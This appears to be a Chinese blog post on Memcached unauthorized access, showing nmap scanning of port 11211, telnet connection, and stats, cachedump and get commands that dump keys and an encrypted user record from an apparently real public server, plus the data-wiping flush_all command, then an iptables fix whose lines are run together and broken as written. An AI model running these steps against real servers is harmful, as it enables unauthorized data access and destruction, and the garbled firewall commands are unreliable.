Memcached是一个高性能的分布式的内存对象缓存系统,通过在内存里维护一个统一的巨大的hash表,它能够用来存储各种格式的数据,包括图像、视频、文件以及数据库检索的结果等。简单的说就是将数据调用到内存中,然后从内存中读取,从而大大提高读取速度。
Memcached是danga的一个项目,由LiveJournal的Brad Fitzpatrick开发,最初为了加速 LiveJournal 访问速度而开发的,后来被很多大型的网站采用。
Memcached是以守护程序方式运行于一个或多个服务器中,随时会接收客户端的连接和操作。
1.漏洞扫描
memcache默认是11211端口,可使用nmap扫描服务器的11211端口:
nmap -n --open -p 11211 X.X.X.X/24
-n 不做反向DNS解析,以加快扫描速度
示例:
MacPC:~ $ nmap -n --open -p 11211 114.215.126.245
Starting Nmap 6.47 ( https://nmap.org ) at 2015-07-14 21:40 CST
Nmap scan report for 114.215.126.245
Host is up (0.054s latency).
PORT STATE SERVICE
11211/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
2.telnet远程连接
telnet X.X.X.X 11211
示例:
MacPC:~ liuxin$ telnet 14.215.126.245 11211
Trying 14.215.126.245...
3.Memcached命令操作
stats items #显示各个slab中item的数目
stats slabs #显示各个slab的信息,包括chunk的大小、数目、使用情况等
stats cachedump 【slab_id】 【limit_num】 #显示某个slab中的前limit_num个key列表
get <key> #获取/检查KeyValue
示例:
MacPC:~ $ telnet 114.215.126.245 11211
Trying 114.215.126.245...
Connected to 114.215.126.245.
Escape character is '^]'.
stats items
STAT items:1:number 1
STAT items:1:age 129210
STAT items:3:number 28
STAT items:3:age 13850257
STAT items:4:number 42
STAT items:4:age 13859565
STAT items:7:number 4
STAT items:7:age 13766769
STAT items:11:number 1
STAT items:11:age 13754452
STAT items:13:number 24
STAT items:13:age 13859428
STAT items:14:number 10
STAT items:14:age 13850271
END
stats slabs
STAT 1:chunk_size 88
STAT 1:chunks_per_page 11915
STAT 1:total_pages 1
STAT 1:total_chunks 11915
STAT 1:used_chunks 11914
STAT 1:free_chunks 1
STAT 1:free_chunks_end 11913
STAT 3:chunk_size 140
STAT 3:chunks_per_page 7489
STAT 3:total_pages 1
STAT 3:total_chunks 7489
STAT 3:used_chunks 7483
STAT 3:free_chunks 6
STAT 3:free_chunks_end 7455
STAT 4:chunk_size 176
STAT 4:chunks_per_page 5957
STAT 4:total_pages 1
STAT 4:total_chunks 5957
STAT 4:used_chunks 5956
STAT 4:free_chunks 1
STAT 4:free_chunks_end 5914
STAT 7:chunk_size 348
STAT 7:chunks_per_page 3013
STAT 7:total_pages 1
STAT 7:total_chunks 3013
STAT 7:used_chunks 3013
STAT 7:free_chunks 0
STAT 7:free_chunks_end 3009
STAT 11:chunk_size 860
STAT 11:chunks_per_page 1219
STAT 11:total_pages 1
STAT 11:total_chunks 1219
STAT 11:used_chunks 1219
STAT 11:free_chunks 0
STAT 11:free_chunks_end 1218
STAT 12:chunk_size 1076
STAT 12:chunks_per_page 974
STAT 12:total_pages 1
STAT 12:total_chunks 974
STAT 12:used_chunks 973
STAT 12:free_chunks 1
STAT 12:free_chunks_end 973
STAT 13:chunk_size 1348
STAT 13:chunks_per_page 777
STAT 13:total_pages 1
STAT 13:total_chunks 777
STAT 13:used_chunks 776
STAT 13:free_chunks 1
STAT 13:free_chunks_end 752
STAT 14:chunk_size 1688
STAT 14:chunks_per_page 621
STAT 14:total_pages 1
STAT 14:total_chunks 621
STAT 14:used_chunks 617
STAT 14:free_chunks 4
STAT 14:free_chunks_end 607
STAT 15:chunk_size 2112
STAT 15:chunks_per_page 496
STAT 15:total_pages 1
STAT 15:total_chunks 496
STAT 15:used_chunks 493
STAT 15:free_chunks 3
STAT 15:free_chunks_end 493
STAT active_slabs 9
STAT total_malloced 9433496
END
stats cachedump 14 5
ITEM Sys_User_201502041350514808393AECA4340411122F [1344 b; 1422521236 s]
ITEM Sys_User_20150205191326670972139D8D42A48B4524 [1356 b; 1422521236 s]
ITEM Sys_User_20150205191749291793220B462B84B83D09 [1312 b; 1422521236 s]
ITEM Sys_User_20150203175420502279340C5AA4731864F4 [1280 b; 1422521236 s]
ITEM Sys_User_2015020516545371286957FE4C8098F0737B [1272 b; 1422521236 s]
END
get Sys_User_2015020516545371286957FE4C8098F0737B
VALUE Sys_User_2015020516545371286957FE4C8098F0737B 274 1272
McTuzvfOnSR4phmiaH0H0TewfTUGCpMGH0H9kbO+0C9WiYVkWBMGe3ZznSYCabXeTTJxTep8J06TGZ6E4pDmbcrM4wv+AVg9ua759CJ9diTgxgavLd8zuP+ZW8DAWg231J9AiCbQW14oxV47DbFlPfSycRmwef0hhCmYacFzhN0KTdKIOnpGNkk77U86sZt4WALnihFn0MOVmEvCnwuZsjmRKB7tsw58cFZkZHUOSjLgMoDY3tfSyNsX4jyctrt9UQ5PEhoXVNMR12pmQ/2A0ppXmxSnHO26d8WeYtaOsov1H9yKz8xVYokiQzHI2/NgzASmk2qteJkd9CfG3kw8ev8enh1mz9b1b0/Db9RNg3PeoU7w5QeChXLKXdTPjAfxJDmLHB37w5n03z2CqvhRKFhL6x7XaZieh/LRyi8N0LYRW5W5z1ZIBIJSE5WTeWR/geLSJsCtF3ADJAVrAx92+SEJcOWE9K3j9bFjtvfl5ymcz9yEGdOXl9Xi9VXOyDwJ7iLVSCT7OyAV+lzsIzZOxXBWFOMFTpv1ZfGufvcx0UrYZQg9h5py1j+SfF7CXsc2HhnGuHgms3vAmZmJYRrVlGt+jNI0bsP/5qZb01J9FGHQjHOuWrezw43km25FAH3Tap2W5BW82SNzoybGhTNE15EV3o2FiGWp7cBYJxbP2igT/PWzYQtViw9hHUVewq2h4Z/mRTFcOpK7CqyQa7o2vN/WIYYTemnPJi2109eLkaxJP2KfbT3nfsPj7HOzeaYDyClurG8CYfkjIIV7ZaeLeYva0BYvBIyrY2e7jMzzJCZ1xeAyOy+cTpfqr4vo5fveAcQoiE0zJSn5k3q8N0OQp8HRUtFvXQ/qSlZYrGNyFSLh+8NVCXX+0FrQ/3g/Ct6RCiqx6rbljLtP1id/I7HbynV0pADIOrdRSZi4Ewa5Y+PLcB68iHVU/lljWsy3z9yEmfiS4byoWAVIQwEtopDvKbhAN94hA/AIP3fbGhcsvV+YtoTcXyHMuHnXUA/CzmgDYBc64JPrW8S3/GxRSmYbJDjQPXIqiNp1e/Z69L5cJ9ggsdvTRYpNZBwtMqUySDyQg9uPkF//mTkVwNOiFqUnjzdhci5nLLQYtjgbxjKeycdgVx6WHvcpcrQRyknh2UhGYFTPMLe/UTPv4gaw67FO410yAlLiFwwMsicIuKflkApOGV6VIc5/usojQ/gpO6SwRFoWfNsZF6fjtmmK0D44tSTYbMBDEDKvYSNK308qaDGeyQ4k9Mt0iw==
END
发现了疑似用户信息,不过是加密后的
其他操作
stats\r\n #检查Memcache服务器状态
stats
STAT pid 5264
STAT uptime 14361081
STAT time 1436882317
STAT version 1.2.4
STAT pointer_size 32
STAT curr_items 106
STAT total_items 31217
STAT bytes 54224
STAT curr_connections 2
STAT total_connections 17339
STAT connection_structures 61
STAT cmd_get 2101820
STAT cmd_set 31217
STAT get_hits 257409
STAT get_misses 1844411
STAT evictions 0
STAT bytes_read 49770310
STAT bytes_written 202786599
STAT limit_maxbytes 1073741824
STAT threads 1
END
pid : 进程id
uptime :总的运行时间,秒数
time : 当前时间
version : 版本号
……
curr_items : 当前缓存中的KeyValue数量
total_items : 曾经总共经过缓存的KeyValue数量
bytes : 所有的缓存使用的内存量
curr_connections 当前连接数
….
cmd_get : 总获取次数
cmd_set : 总的写入次数
get_hits : 总的命中次数
miss_hits : 获取失败次数
…..
bytes_read : 总共读取的流量字节数
bytes_written : 总的写入流量字节
limit_maxbytes : 最大允许使用的内存量,字节
flush_all #清空所有键值
注:flush并不会将items删除,只是将所有的items标记为expired,因此这时memcache依旧占用所有内存。
quit\r\n #退出
修复方案--->限定访问的IP
使用iptables限制访问IP,只允许IP为X.X.X.X的主机访问memcached:
iptables -Fiptables -P INPUT DROP
iptables -A INPUT -p tcp -s X.X.X.X --dport11211-j ACCEPT
iptables -A INPUT -p udp -s X.X.X.X --dport11211-j ACCEPT
© 走过岁月...... | Powered by LOFTER